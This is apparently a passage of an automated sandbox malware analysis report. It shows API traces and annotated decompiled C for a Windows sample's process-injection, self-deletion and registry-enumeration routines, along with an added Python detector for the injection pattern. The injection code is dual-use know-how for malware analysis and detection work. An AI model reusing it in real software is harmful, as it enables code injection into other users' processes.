• lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
• wsprintfA.USER32 ref: 0040A0B6
• lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
• lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
• CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
• DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
• GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
• GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
• GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
• GetCommandLineA.KERNEL32 ref: 0040A1E5
  • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,004122F8,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
  • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
  • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
• lstrlenA.KERNEL32(?), ref: 0040A288
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                • DeleteFileA.KERNEL32(C:\Users\user\Desktop\file.exe), ref: 0040A407
                                                                                • CreateThread.KERNEL32 ref: 0040A42C
                                                                                • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                • CreateThread.KERNEL32 ref: 0040A469
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                • String ID: "$"$"$%X%08X$C:\Users\user\Desktop\file.exe$C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D$P$\$htdzdeug
                                                                                • API String ID: 2089075347-1142321554
                                                                                • Opcode ID: dd92c2d398ffab15ef98c822b30add3de372c5a293a501ef1d9825a70cf67c33
                                                                                • Instruction ID: 2e8e4d28fd33f050895bc00b790e6664de298002562c0b6b0b892c26365fcd94
                                                                                • Opcode Fuzzy Hash: dd92c2d398ffab15ef98c822b30add3de372c5a293a501ef1d9825a70cf67c33
                                                                                • Instruction Fuzzy Hash: E95291B1D40259BBDB11DBA1CC49EEF7BBCAB04304F1444BBF509F6182D6788E948B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 486 40637c-406384 487 406386-406389 486->487 488 40638a-4063b4 GetModuleHandleA VirtualAlloc 486->488 489 4063f5-4063f7 488->489 490 4063b6-4063d4 call 40ee08 VirtualAllocEx 488->490 492 40640b-40640f 489->492 490->489 494 4063d6-4063f3 call 4062b7 WriteProcessMemory 490->494 494->489 497 4063f9-40640a 494->497 497->492
                                                                                C-Code - Quality: 100%
                                                                                			E0040637C(intOrPtr _a4, void* _a8, intOrPtr* _a12, void** _a16) {
                                                                                				void* _v8;
                                                                                				void* _t15;
                                                                                				void* _t16;
                                                                                				void* _t18;
                                                                                				int _t20;
                                                                                				long _t26;
                                                                                				struct HINSTANCE__* _t32;
                                                                                				void* _t37;
                                                                                
                                                                                				if(_a8 != 0) { // _a8: handle to the target process
                                                                                					_t32 = GetModuleHandleA(0); // base address of the sample's own image
                                                                                					_t26 =  *( *((intOrPtr*)(_t32 + 0x3c)) + _t32 + 0x50); // e_lfanew -> IMAGE_NT_HEADERS; +0x50 is OptionalHeader.SizeOfImage, so the whole mapped image is copied
                                                                                					_t15 = VirtualAlloc(0, _t26, 0x1000, 4); // executed; MEM_COMMIT, PAGE_READWRITE: local staging copy
                                                                                					_v8 = _t15;
                                                                                					if(_t15 == 0) {
                                                                                						L5:
                                                                                						_t16 = 0;
                                                                                					} else {
                                                                                						E0040EE08(_t15, _t32, _t26); // helper not shown; given its (dst, src, size) arguments, copies the image into the staging buffer
                                                                                						_t18 = VirtualAllocEx(_a8, 0, _t26, 0x1000, 0x40); // executed; MEM_COMMIT, PAGE_EXECUTE_READWRITE in the target process
                                                                                						_t37 = _t18;
                                                                                						if(_t37 == 0) {
                                                                                							goto L5;
                                                                                						} else {
                                                                                							E004062B7(_v8, _t37); // helper not shown; takes the staged copy and the remote base, i.e. a fix-up of the copy for its new address
                                                                                							_t20 = WriteProcessMemory(_a8, _t37, _v8, _t26, 0); // executed; the RWX region now holds a copy of this image
                                                                                							if(_t20 != 0) {
                                                                                								 *_a16 = _t37; // remote image base, returned to the caller
                                                                                								 *_a12 = _t37 - _t32 + _a4; // _a4 (a local address; the caller at 00409816 passes an entry point, see the APIs list) rebased into the remote copy
                                                                                								_t16 = 1;
                                                                                							} else {
                                                                                								goto L5;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					return _t16;
                                                                                				} else {
                                                                                					return 0;
                                                                                				}
                                                                                			}
                                                                                Instruction addresses for the C-code lines above (one per statement, in listing order; 0x00000000 marks a line with no instruction of its own): 0x00406384, 0x00406395, 0x0040639a, 0x004063a9, 0x004063af, 0x004063b4, 0x004063f5, 0x004063f5, 0x004063b6, 0x004063b9, 0x004063ca, 0x004063d0, 0x004063d4, 0x00000000, 0x004063d6, 0x004063da, 0x004063eb, 0x004063f3, 0x004063fc, 0x00406406, 0x0040640a, 0x00000000, 0x00000000, 0x00000000, 0x004063f3, 0x004063d4, 0x0040640f, 0x00406386, 0x00406389, 0x00406389

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9
                                                                                • VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA
                                                                                • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB
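The helper E0040637C above is the sample's injection primitive: it sizes the copy from its own in-memory PE header, stages the image in a local read-write buffer, allocates an executable-and-writable region in the target process, writes the copy there and hands back the rebased entry address. The Python below is an added example, not code from the report or from the sample. It re-implements the two arithmetic steps (the SizeOfImage read at e_lfanew+0x50 and the rebasing fix-up) on a header constructed here, and runs a small detector for the VirtualAllocEx(PAGE_EXECUTE_READWRITE) followed by WriteProcessMemory pair over the API lines copied from the list above. All function and constant names are mine; the header bytes are not a loadable image.

```python
"""Added example (not code from the report or from the sample): two checks
drawn from the injection helper E0040637C.

1. size_of_image() re-implements the *( *(base+0x3c) + base + 0x50 ) read
   that sizes the copy, and rebase() the *_a12 = remote - local + _a4 fix-up.
2. find_rwx_injection() scans Joe-Sandbox-style API lines for the
   VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory pair.

SAMPLE_TRACE is copied from the APIs list of E0040637C; the PE header bytes
are constructed here and are not a loadable image. Function names are mine.
"""
import re
import struct

MEM_COMMIT = 0x1000            # flAllocationType used by both allocations
PAGE_READWRITE = 0x04          # protection of the local staging buffer
PAGE_EXECUTE_READWRITE = 0x40  # protection of the remote buffer

def size_of_image(image):
    """e_lfanew (offset 0x3c) -> IMAGE_NT_HEADERS; +0x18 is OptionalHeader and
    +0x38 within it is SizeOfImage, hence the +0x50 in the decompiled code.
    Unlike the sample, verify both signatures before trusting the offsets."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    return struct.unpack_from("<I", image, e_lfanew + 0x50)[0]

def rebase(local_addr, local_base, remote_base):
    """Same RVA, different base: the value the helper stores through _a12."""
    return remote_base - local_base + local_addr

def make_header(size, e_lfanew=0x80):
    """Constructed DOS header + NT signature + PE32 optional header (demo only)."""
    hdr = bytearray(e_lfanew + 0x18 + 0xE0)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    hdr[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", hdr, e_lfanew + 0x18, 0x10B)   # OptionalHeader.Magic, PE32
    struct.pack_into("<I", hdr, e_lfanew + 0x50, size)    # OptionalHeader.SizeOfImage
    return bytes(hdr)

# Copied verbatim from the APIs list of E0040637C.
SAMPLE_TRACE = [
    "GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00409816,EntryPoint), ref: 0040638F",
    "VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,00409816,EntryPoint), ref: 004063A9",
    "VirtualAllocEx.KERNELBASE(00000000,00000000,?,00001000,00000040), ref: 004063CA",
    "WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 004063EB",
]

API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\)(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?")

def _arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None          # the analyser could not recover this argument
    try:
        return int(tok, 16)
    except ValueError:
        return tok           # symbolic argument such as a string label

def parse_api_line(line):
    """One report line -> (api, [args], ref) or None for lines without a call."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = [_arg(t) for t in m.group("args").split(",") if t.strip()]
    return m.group("api"), args, m.group("ref")

def find_rwx_injection(lines):
    """Return (alloc_ref, write_ref) pairs. Keys on flProtect only: in this
    static listing the process handle shows as 00000000 because it was not
    recovered, so the handle is not a reliable discriminator."""
    findings, pending = [], None
    for line in lines:
        parsed = parse_api_line(line)
        if parsed is None:
            continue
        api, args, ref = parsed
        if api == "VirtualAllocEx" and len(args) >= 5 and isinstance(args[4], int) \
                and args[4] & PAGE_EXECUTE_READWRITE:
            pending = ref
        elif api == "WriteProcessMemory" and pending is not None:
            findings.append((pending, ref))
            pending = None
    return findings

if __name__ == "__main__":
    print(hex(size_of_image(make_header(0x13000))))
    print(hex(rebase(0x409816, 0x400000, 0x1E0000)))
    print(find_rwx_injection(SAMPLE_TRACE))
```

The detector deliberately ignores the process-handle argument: in a static listing like this one it is unrecovered, and in a live trace the malware's own handle would be a real value, so flProtect plus the following write is the stable signal.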
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 1965334864-0
                                                                                • Opcode ID: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                • Instruction ID: 5c31eb3238d54f8d6ca6dd7d72ba58cabd3ec10295ac0618dae15ec7b9dc1832
                                                                                • Opcode Fuzzy Hash: 6b7839f040fb078f737eaa4cdd504cc34e5d0933869709ec770a1cd6c6f8f9ba
                                                                                • Instruction Fuzzy Hash: B911A3B1600219BFEB119F65DC49F9B3FA8EB047A4F114035FD09E7290D775DC108AA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 264 4073ff-407419 265 40741b 264->265 266 40741d-407422 264->266 265->266 267 407424 266->267 268 407426-40742b 266->268 267->268 269 407430-407435 268->269 270 40742d 268->270 271 407437 269->271 272 40743a-407481 call 406dc2 call 402544 RegOpenKeyExA 269->272 270->269 271->272 277 407487-40749d call 40ee2a 272->277 278 4077f9-4077fe call 40ee2a 272->278 283 407703-40770e RegEnumKeyA 277->283 284 407801 278->284 285 4074a2-4074b1 call 406cad 283->285 286 407714-40771d RegCloseKey 283->286 287 407804-407808 284->287 290 4074b7-4074cc call 40f1a5 285->290 291 4076ed-407700 285->291 286->284 290->291 294 4074d2-4074f8 RegOpenKeyExA 290->294 291->283 295 407727-40772a 294->295 296 4074fe-407530 call 402544 RegQueryValueExA 294->296 297 407755-407764 call 40ee2a 295->297 298 40772c-407740 call 40ef00 295->298 296->295 305 407536-40753c 296->305 306 4076df-4076e2 297->306 307 407742-407745 RegCloseKey 298->307 308 40774b-40774e 298->308 309 40753f-407544 305->309 306->291 310 4076e4-4076e7 RegCloseKey 306->310 307->308 312 4077ec-4077f7 RegCloseKey 308->312 309->309 311 407546-40754b 309->311 310->291 311->297 313 407551-40756b call 40ee95 311->313 312->287 313->297 316 407571-407593 call 402544 call 40ee95 313->316 321 407753 316->321 322 407599-4075a0 316->322 321->297 323 4075a2-4075c6 call 40ef00 call 40ed03 322->323 324 4075c8-4075d7 call 40ed03 322->324 330 4075d8-4075da 323->330 324->330 331 4075dc 330->331 332 4075df-407623 call 40ee95 call 402544 call 40ee95 call 40ee2a 330->332 331->332 342 407626-40762b 332->342 342->342 343 40762d-407634 342->343 344 407637-40763c 343->344 344->344 345 40763e-407642 344->345 346 407644-407656 call 40ed77 345->346 347 40765c-407673 call 40ed23 345->347 346->347 352 407769-40777c call 40ef00 346->352 353 407680 347->353 354 407675-40767e 347->354 359 4077e3-4077e6 RegCloseKey 352->359 356 407683-40768e call 406cad 353->356 
354->356 361 407722-407725 356->361 362 407694-4076bf call 40f1a5 call 406c96 356->362 359->312 363 4076dd 361->363 368 4076c1-4076c7 362->368 369 4076d8 362->369 363->306 368->369 370 4076c9-4076d2 368->370 369->363 370->369 371 40777e-407797 GetFileAttributesExA 370->371 372 407799 371->372 373 40779a-40779f 371->373 372->373 374 4077a1 373->374 375 4077a3-4077a8 373->375 374->375 376 4077c4-4077c8 375->376 377 4077aa-4077c0 call 40ee08 375->377 379 4077d7-4077dc 376->379 380 4077ca-4077d6 call 40ef00 376->380 377->376 381 4077e0-4077e2 379->381 382 4077de 379->382 380->379 381->359 382->381
                                                                                C-Code - Quality: 76%
                                                                                			E004073FF(void* __ecx, intOrPtr* _a4, signed int* _a8, int** _a12, char* _a16, char* _a20) {
                                                                                				CHAR* _v8;
                                                                                				void* _v12;
                                                                                				int _v16;
                                                                                				void* _v20;
                                                                                				int* _v24;
                                                                                				char* _v28;
                                                                                				intOrPtr _v32;
                                                                                				int _v36;
                                                                                				char _v295;
                                                                                				char _v296;
                                                                                				char _v556;
                                                                                				void _v592;
                                                                                				intOrPtr* _t85;
                                                                                				int** _t86;
                                                                                				char* _t87;
                                                                                				char* _t88;
                                                                                				intOrPtr _t89;
                                                                                				char* _t91;
                                                                                				long _t92;
                                                                                				signed int _t93;
                                                                                				long _t97;
                                                                                				signed int _t103;
                                                                                				long _t107;
                                                                                				char* _t118;
                                                                                				intOrPtr* _t119;
                                                                                				CHAR* _t123;
                                                                                				void* _t125;
                                                                                				char* _t127;
                                                                                				intOrPtr* _t134;
                                                                                				void* _t136;
                                                                                				intOrPtr _t137;
                                                                                				signed int* _t146;
                                                                                				int** _t147;
                                                                                				void* _t160;
                                                                                				signed int _t163;
                                                                                				intOrPtr _t164;
                                                                                				void* _t165;
                                                                                				intOrPtr _t167;
                                                                                				intOrPtr _t172;
                                                                                				intOrPtr* _t173;
                                                                                				void* _t186;
                                                                                				intOrPtr _t187;
                                                                                				int* _t188;
                                                                                				void* _t190;
                                                                                				void* _t191;
                                                                                				char* _t192;
                                                                                				signed int _t194;
                                                                                				int* _t196;
                                                                                				void* _t202;
                                                                                				void* _t203;
                                                                                				void* _t204;
                                                                                				void* _t206;
                                                                                
                                                                                				_t165 = __ecx;
                                                                                				_t85 = _a8;
                                                                                				_t188 = 0;
                                                                                				_v16 = 0x104;
                                                                                				if(_t85 != 0) {
                                                                                					 *_t85 = 0;
                                                                                				}
                                                                                				_t86 = _a12;
                                                                                				if(_t86 != _t188) {
                                                                                					 *_t86 = _t188;
                                                                                				}
                                                                                				_t87 = _a16;
                                                                                				if(_t87 != _t188) {
                                                                                					 *_t87 = 0;
                                                                                				}
                                                                                				_t88 = _a20;
                                                                                				if(_t88 != _t188) {
                                                                                					 *_t88 = 0; // executed
                                                                                				}
                                                                                				_t89 = E00406DC2(_t165); // executed; helper not shown, produces the value each hashed subkey name is compared against below
                                                                                				_v32 = _t89;
                                                                                				_t160 = 0xe4;
                                                                                				_t91 = E00402544(0x4122f8, 0x4106e8, 0x22, 0xe4, 0xc8); // helper not shown; its result is used as the subkey path below, apparently built from 0x22 bytes at 0x4106e8 into the global 0x4122f8 buffer
                                                                                				_t204 = _t203 + 0x14;
                                                                                				_t92 = RegOpenKeyExA(0x80000002, _t91, _t188, 0x20119,  &_v20); // executed; HKEY_LOCAL_MACHINE, 0x20119 = KEY_READ | KEY_WOW64_64KEY
                                                                                				_push(0x100);
                                                                                				_push(_t188);
                                                                                				_push(0x4122f8);
                                                                                				if(_t92 != 0) {
                                                                                					_t93 = E0040EE2A(_t165);
                                                                                					goto L66;
                                                                                				} else {
                                                                                					E0040EE2A(_t165);
                                                                                					_t206 = _t204 + 0xc;
                                                                                					_push(_v16);
                                                                                					_push( &_v556);
                                                                                					_v24 = _t188;
                                                                                					_push(_t188);
                                                                                					while(1) {
                                                                                						_t97 = RegEnumKeyA(_v20, ??, ??, ??); // executed; walks every subkey of the HKLM key opened above (index, name buffer and 0x104 size were pushed before the loop)
                                                                                						if(_t97 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						if(E00406CAD( &_v556) == 0) {
                                                                                							L41:
                                                                                							_v24 =  &(_v24[0]);
                                                                                							_push(0x104);
                                                                                							_v16 = 0x104;
                                                                                							_push( &_v556);
                                                                                							_push(_v24);
                                                                                							continue;
                                                                                						}
                                                                                						_t103 = E0040F1A5( &_v556); // helper not shown; hashes the enumerated subkey name
                                                                                						_pop(_t167);
                                                                                						if((_t103 ^ 0x61616161) != _v32) { // only the subkey whose hashed name matches the value from E00406DC2 is examined further
                                                                                							goto L41;
                                                                                						}
                                                                                						_v12 = _t188;
                                                                                						_v16 = 0x104;
                                                                                						_t107 = RegOpenKeyExA(_v20,  &_v556, _t188, 0x101,  &_v12); // executed; 0x101 = KEY_QUERY_VALUE | KEY_WOW64_64KEY
                                                                                						if(_t107 != _t188) {
                                                                                							L45:
                                                                                							if(_t107 != 5) { // 5 == ERROR_ACCESS_DENIED: on that error the subkey name is handed to E0040EF00 with _a16 and the function returns 0
                                                                                								L50:
                                                                                								E0040EE2A(_t167, 0x4122f8, _t188, 0x100);
                                                                                								_t206 = _t206 + 0xc;
                                                                                								L39:
                                                                                								if(_v12 != _t188) {
                                                                                									RegCloseKey(_v12);
                                                                                								}
                                                                                								goto L41;
                                                                                							}
                                                                                							E0040EF00(_a16,  &_v556); // helper not shown; given its arguments, copies the subkey name into the caller's _a16 buffer
                                                                                							if(_v12 != _t188) {
                                                                                								RegCloseKey(_v12);
                                                                                							}
                                                                                							_push(4);
                                                                                							_pop(0);
                                                                                							L64:
                                                                                							RegCloseKey(_v20);
                                                                                							return 0;
                                                                                						}
                                                                                						_t118 = E00402544(0x4122f8, 0x4106dc, 0xa, _t160, 0xc8);
                                                                                						_t206 = _t206 + 0x14;
                                                                                						_t107 = RegQueryValueExA(_v12, _t118, _t188,  &_v36,  &_v296,  &_v16); // executed
                                                                                						if(_t107 != _t188) {
                                                                                							goto L45;
                                                                                						}
                                                                                						_t119 =  &_v556;
                                                                                						_t186 = _t119 + 1;
                                                                                						do {
                                                                                							_t167 =  *_t119;
                                                                                							_t119 = _t119 + 1;
                                                                                						} while (_t167 != 0);
                                                                                						if(_v16 <= _t119 - _t186) {
                                                                                							goto L50;
                                                                                						}
                                                                                						_t123 = E0040EE95( &_v296,  &_v556);
                                                                                						_pop(_t167);
                                                                                						_v8 = _t123;
                                                                                						if(_t123 == _t188) {
                                                                                							goto L50;
                                                                                						}
                                                                                						_t125 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
                                                                                						_t206 = _t206 + 0x1c;
                                                                                						if(_t125 == 0) {
                                                                                							_t188 = 0;
                                                                                							goto L50;
                                                                                						}
                                                                                						if(_v296 != 0x22) {
                                                                                							_t127 = E0040ED03( &_v296, 0x20);
                                                                                							_pop(_t167);
                                                                                						} else {
                                                                                							E0040EF00( &_v296,  &_v295);
                                                                                							_t127 = E0040ED03( &_v296, 0x22);
                                                                                							_t206 = _t206 + 0x10;
                                                                                						}
                                                                                						if(_t127 != 0) {
                                                                                							 *_t127 = 0;
                                                                                						}
                                                                                						_v8 = E0040EE95( &_v296,  &_v556);
                                                                                						_v28 = E0040EE95(_v8, E00402544(0x4122f8, 0x410694, 5, _t160, 0xc8));
                                                                                						E0040EE2A(_t167, 0x4122f8, 0, 0x100);
                                                                                						_t134 = _a4;
                                                                                						_t206 = _t206 + 0x30;
                                                                                						_t190 = _t134 + 1;
                                                                                						do {
                                                                                							_t172 =  *_t134;
                                                                                							_t134 = _t134 + 1;
                                                                                						} while (_t172 != 0);
                                                                                						_t173 = _v8;
                                                                                						_t191 = _t134 - _t190;
                                                                                						_t43 = _t173 + 1; // 0x1
                                                                                						_t136 = _t43;
                                                                                						do {
                                                                                							_t187 =  *_t173;
                                                                                							_t173 = _t173 + 1;
                                                                                						} while (_t187 != 0);
                                                                                						_t174 = _t173 - _t136;
                                                                                						if(_t191 <= _t173 - _t136 || E0040ED77(_t191 - _t174 + _a4, _v8) != 0) {
                                                                                							_t192 = _v28;
                                                                                							 *_t192 = 0;
                                                                                							_t137 = E0040ED23(_v8, 0x5c);
                                                                                							_v8 = _t137;
                                                                                							if(_t137 != 0) {
                                                                                								_v8 = _v8 + 1;
                                                                                							} else {
                                                                                								_v8 =  &_v296;
                                                                                							}
                                                                                							if(E00406CAD(_v8) == 0) {
                                                                                								 *_t192 = 0x2e;
                                                                                								goto L38;
                                                                                							} else {
                                                                                								_t194 = E0040F1A5(_v8) ^ 0x61616161;
                                                                                								_t163 = _t194 >> 0x00000008 & 0x000000ff;
                                                                                								 *_v28 = 0x2e;
                                                                                								if(E00406C96(_t194) != 0) {
                                                                                									L37:
                                                                                									_t160 = 0xe4;
                                                                                									L38:
                                                                                									_t188 = 0;
                                                                                									goto L39;
                                                                                								}
                                                                                								_t56 = _t163 - 0x51; // -81
                                                                                								if(_t56 > 0x2e || (_t194 & 0x000000ff) >= 0x10) {
                                                                                									goto L37;
                                                                                								} else {
                                                                                									_t196 = 0;
                                                                                									if(GetFileAttributesExA( &_v296, 0,  &_v592) != 0) {
                                                                                										_t196 = 1;
                                                                                									}
                                                                                									_t146 = _a8;
                                                                                									if(_t146 != 0) {
                                                                                										 *_t146 = _t163;
                                                                                									}
                                                                                									_t164 = _a16;
                                                                                									if(_t164 != 0) {
                                                                                										_t202 = _v8 -  &_v296;
                                                                                										E0040EE08(_t164,  &_v296, _t202);
                                                                                										 *((char*)(_t202 + _t164)) = 0;
                                                                                									}
                                                                                									if(_a20 != 0) {
                                                                                										E0040EF00(_a20, _v8);
                                                                                									}
                                                                                									_t147 = _a12;
                                                                                									if(_t147 != 0) {
                                                                                										 *_t147 = _t196;
                                                                                									}
                                                                                									_push(3);
                                                                                									_pop(0);
                                                                                									goto L63;
                                                                                								}
                                                                                							}
                                                                                						} else {
                                                                                							E0040EF00(_a16,  &_v556);
                                                                                							L63:
                                                                                							RegCloseKey(_v12); // executed
                                                                                							goto L64;
                                                                                						}
                                                                                					}
                                                                                					_t93 = RegCloseKey(_v20);
                                                                                					L66:
                                                                                					return _t93 | 0xffffffff;
                                                                                				}
                                                                                			}

APIs
• RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,74CB43E0,00000000), ref: 00407472
• RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 004074F0
• RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407528
• ___ascii_stricmp.LIBCMT ref: 0040764D
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,74CB43E0,00000000), ref: 004076E7
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407717
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,74CB43E0,00000000), ref: 00407745
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,74CB43E0,00000000), ref: 004077EF
  • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
• GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
• RegCloseKey.KERNELBASE(?), ref: 004077E6
Strings
Memory Dump Source
• Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
• String ID: "
• API String ID: 3433985886-123907689
• Opcode ID: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
• Instruction ID: 7fe5a339a68ccf6b09c70fd716338511db9c3a0a85de510e5ec7ef93542d7acc
• Opcode Fuzzy Hash: be1730cef161fe20a2692bf5d8dfd6f9750a488cf0ac433aa7dcf1ab0d83bb1b
• Instruction Fuzzy Hash: 10C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1044B7F504B72D1EA78AE908B69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 386 e3003c-e30047 387 e30049 386->387 388 e3004c-e30263 call e30a3f call e30e0f call e30d90 VirtualAlloc 386->388 387->388 403 e30265-e30289 call e30a69 388->403 404 e3028b-e30292 388->404 408 e302ce-e303c2 VirtualProtect call e30cce call e30ce7 403->408 406 e302a1-e302b0 404->406 407 e302b2-e302cc 406->407 406->408 407->406 415 e303d1-e303e0 408->415 416 e303e2-e30437 call e30ce7 415->416 417 e30439-e304b8 VirtualFree 415->417 416->415 419 e305f4-e305fe 417->419 420 e304be-e304cd 417->420 421 e30604-e3060d 419->421 422 e3077f-e30789 419->422 424 e304d3-e304dd 420->424 421->422 425 e30613-e30637 421->425 427 e307a6-e307b0 422->427 428 e3078b-e307a3 422->428 424->419 429 e304e3-e30505 LoadLibraryA 424->429 434 e3063e-e30648 425->434 430 e307b6-e307cb 427->430 431 e3086e-e308be LoadLibraryA 427->431 428->427 432 e30517-e30520 429->432 433 e30507-e30515 429->433 435 e307d2-e307d5 430->435 442 e308c7-e308f9 431->442 436 e30526-e30547 432->436 433->436 434->422 437 e3064e-e3065a 434->437 438 e307d7-e307e0 435->438 439 e30824-e30833 435->439 440 e3054d-e30550 436->440 437->422 441 e30660-e3066a 437->441 443 e307e2 438->443 444 e307e4-e30822 438->444 448 e30839-e3083c 439->448 445 e305e0-e305ef 440->445 446 e30556-e3056b 440->446 447 e3067a-e30689 441->447 449 e30902-e3091d 442->449 450 e308fb-e30901 442->450 443->439 444->435 445->424 451 e3056f-e3057a 446->451 452 e3056d 446->452 453 e30750-e3077a 447->453 454 e3068f-e306b2 447->454 448->431 455 e3083e-e30847 448->455 450->449 457 e3059b-e305bb 451->457 458 e3057c-e30599 451->458 452->445 453->434 459 e306b4-e306ed 454->459 460 e306ef-e306fc 454->460 461 e3084b-e3086c 455->461 462 e30849 455->462 469 e305bd-e305db 457->469 458->469 459->460 463 e3074b 460->463 464 e306fe-e30748 460->464 461->448 462->431 463->447 464->463 469->440
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00E3024D
Strings
Memory Dump Source
• Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: c2009aa6a2be5771bebaa03659693ae4346eb82dea4946fc49c5341671366fb5
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 5E526874A01229DFDB64CF58C995BA8BBB1BF09304F1480E9E94DAB351DB30AE85DF14
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
